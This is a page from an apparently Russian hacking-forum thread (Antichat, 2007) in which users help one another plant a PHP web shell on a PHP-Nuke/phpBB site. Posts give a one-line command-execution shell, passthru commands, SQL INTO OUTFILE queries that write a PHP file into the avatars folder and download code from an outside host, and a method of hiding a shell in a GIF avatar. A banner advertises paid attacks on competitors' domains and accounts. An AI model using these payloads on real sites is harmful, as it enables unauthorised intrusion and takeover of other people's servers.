Проблемы при заливке шелла

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Проблемы при заливке шелла

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

04.07.2007, 23:01

maxster

Участник форума

Регистрация: 27.10.2006

Сообщений: 205

С нами: 10282956

Репутация: 380

попробуй багу с подменой аватарного пути

_http://forum.antichat.ru/showpost.php?p=281765&postcount=2

#12

04.07.2007, 23:11

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

хз, пробуй <? exec($_GET[cmd]); ?>

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#13

05.07.2007, 01:07

Azter

Познающий

Регистрация: 01.09.2005

Сообщений: 51

С нами: 10889223

Репутация: 5

safe mode - off
Spyder
Не катит =(
maxster
А смысл? там-же тоже через инклуд(или ты о 7 способе?)

Последний раз редактировалось Azter; 05.07.2007 в 01:12..

#14

05.07.2007, 02:11

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

а если сделать так?

Код:

SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Да и с путями разберись

__________________
Карфаген должен быть разрушен...

#15

05.07.2007, 12:41

Azter

Познающий

Регистрация: 01.09.2005

Сообщений: 51

С нами: 10889223

Репутация: 5

Код:

SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

выбрасывает вот такую фигню

Цитата:

Warning: filesize() [function.filesize]: stat failed for http://host.narod.ru/files.txt in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

Warning: fread() [function.fread]: Length parameter must be greater than 0 in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

GrAmOzEkA
Пару раз уже говорил - не прокатит инклуд.

#16

05.07.2007, 19:28

andy13

Участник форума

Регистрация: 04.02.2007

Сообщений: 120

С нами: 10140086

Репутация: 36

Почему бы просто не сделать так:
<? passthru("команда"); ?>
если по-другому не получается

#17

05.07.2007, 19:34

Micr0b

Участник форума

Регистрация: 14.01.2006

Сообщений: 242

С нами: 10695206

Репутация: 245

andy13 - читай пост c411k на 1 странице

#18

05.07.2007, 23:29

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

С нами: 10957346

Репутация: 2727

мдя. выставляешь в админке phpbb максимальный размер загруж авы 150кб, грузишь аву

http://c411k.jino-net.ru/upload/achat.gif
бэкапишь бд с запросом

Код:

SELECT '<?php include("/avatars/achat.gif"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

и у тебя есть полноценный шелл от рст. если не можешь изменить размер, то рисуешь в фотошопе пиксель 1х1, сохраняешь, открываешь в HEX-редакторе и встявляешь в конец маленький по размеру шелл.

__________________
ПИУ-ПИУ...

#19

06.07.2007, 09:01

andy13

Участник форума

Регистрация: 04.02.2007

Сообщений: 120

С нами: 10140086

Репутация: 36

Micr0b, я писал про вставку команд напрямую
passthru("uname -a; id ..."), а не про передачу их через запросы.

#20

08.07.2007, 17:48

tbody

Новичок

Регистрация: 07.07.2007

Сообщений: 21

С нами: 9918779

Репутация: 1

А если там стоит ASP.Net без ПХП, то что тогда использовать?
Есть только возможность править страницу.

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблемы с заливкой шелла в ipb	anakreon	Уязвимости CMS / форумов	8	18.03.2007 15:20
Проблемы с заливкой шелла на phpbb	AlexCRC	Уязвимости CMS / форумов	8	21.10.2006 17:37
UBB Threads 6.5.1 (Инструкция по заливке шелла)	pch	Уязвимости CMS / форумов	0	30.04.2006 20:20
Проблемы с Аничатовскими штучками.	temon	Болталка	4	27.09.2005 12:52

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход